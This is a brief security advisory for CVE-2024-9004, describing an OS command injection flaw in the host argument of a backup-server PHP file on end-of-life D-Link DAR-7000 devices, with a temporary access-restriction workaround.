CVE-2024-9004

Name of the Vulnerable Software and Affected Versions D-Link DAR-7000 up to 20240912

Description A critical vulnerability has been found in the file /view/DBManage/Backup Server commit.php, allowing for os command injection through the manipulation of the host argument. This issue can be exploited remotely. The vulnerability exists due to the lack of measures to neutralize special elements used in the operating system command. It is possible for an attacker to execute arbitrary commands remotely.

Recommendations For D-Link DAR-7000 up to 20240912, as the products are no longer supported by the maintainer, there is no information about a newer version that contains a fix for this vulnerability. As a temporary workaround, consider restricting access to the /view/DBManage/Backup Server commit.php file and avoiding the use of the host argument in this context until further guidance is available.